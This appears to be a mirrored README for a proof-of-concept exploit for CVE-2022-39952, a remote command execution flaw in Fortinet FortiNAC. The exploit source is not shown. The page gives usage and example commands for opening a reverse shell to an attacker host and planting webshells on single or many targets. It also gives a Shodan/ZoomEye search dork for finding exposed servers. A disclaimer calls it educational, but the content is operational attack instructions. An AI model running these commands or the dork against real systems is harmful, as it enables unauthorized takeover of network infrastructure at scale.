CVE-2022-39952 PoC — Fortinet FortiNAC 安全漏洞

来源

关联漏洞

Description

PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

介绍

# FortiNAC CVE-2022-39952

## PoC for CVE-2022-39952 affecting Fortinet FortiNAC.

> This exploit allows an attacker to execute arbitrary commands on the FortiNAC server. It is based on the PoC developed by [horizon3ai](https://github.com/horizon3ai/CVE-2022-39952), with additional options for targeting multiple hosts.

> Disclaimer: This exploit is for educational purposes only. Please use responsibly and with permission.

## Usage:

```bash
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -l LIST, --list LIST  List of targets
  -lh LHOST, --lhost LHOST
                        The local host for the reverse shell
  -lp LPORT, --lport LPORT
                        The local port for the reverse shell
```

To use this exploit, you must have Python 3.x installed on your system.

## Requirements:
    Python 3.x
    requests module
    concurrent.futures module

## Examples:

### Execute a reverse shell on a single target:
```bash
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
```

### Execute a webshell on a single target:
```
$ python exploit.py -t 192.168.1.100
```

### Execute a webshell on multiple targets from a list:
```bash
$ python exploit.py -l targets.txt
```

## Note:

>This exploit has only been tested on a limited number of targets, so its effectiveness may vary. The dork for finding potential targets on ZoomEye and Shodan is:

`title:"FortiNAC" +"JSESSIONID"`

文件快照

 [4.0K]  /data/pocs/89c80c88793f70a45d9cd1ba9bc79d69e95e134f
├── [5.8K]  exploit.py
└── [1.5K]  README.md

0 directories, 2 files

备注